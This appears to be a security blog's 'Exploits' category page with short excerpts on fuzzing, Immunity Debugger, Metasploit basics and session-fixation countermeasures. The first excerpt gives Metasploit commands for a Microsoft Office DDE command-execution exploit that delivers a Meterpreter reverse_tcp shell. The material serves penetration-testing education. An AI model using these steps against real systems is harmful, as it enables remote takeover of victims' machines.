Category: Exploits

All about Exploits!

Exploits, Office

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module: wget; Move module into framework: mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/; Open Metasploit and load exploit: msfconsole, reload_all, use exploit/windows/dde_delivery; Set the server host: set SRVHOST SRVHOST; Choose payload and run it: set PAYLOAD windows/meterpreter/reverse_tcp, set LHOST, set LPORT 443, exploit …

Exploits, Fuzzing

Security oriented open source fuzzer

American fuzzy lop is a security-oriented fuzzer that employs a novel type of compile-time instrumentation and genetic algorithms to automatically discover clean, interesting test cases that trigger new internal states in the targeted binary. This substantially improves the functional coverage for the fuzzed code. The compact synthesized corpora produced by the tool are also useful …

Exploits, Malware Analysis, Reverse Engineering

Write exploits, analyze malware, and reverse engineer binary files

Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry’s first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility. Overview A debugger with functionality designed …

Exploits, Metasploit

Metasploit – Introduction – Part 1

Metasploit is an entire framework that provides the tools needed during a penetration test to identify flaws and run various exploits against a remote target machine. It simplifies network discovery and vulnerability verification, increasing the probability of success for your project. It is one of the most popular tools in the field of information security and …

Exploits, Vulnerabilities

Preventing Session fixation – hijacking

“Session fixation attacks attempt to exploit the vulnerability of a system which allows one person to fixate (set) another person’s session identifier (SID). Most session fixation attacks are web based, and most rely on session identifiers being accepted from URLs (query string) or POST data.” (from Wiki). Let’s see some countermeasures we can take to …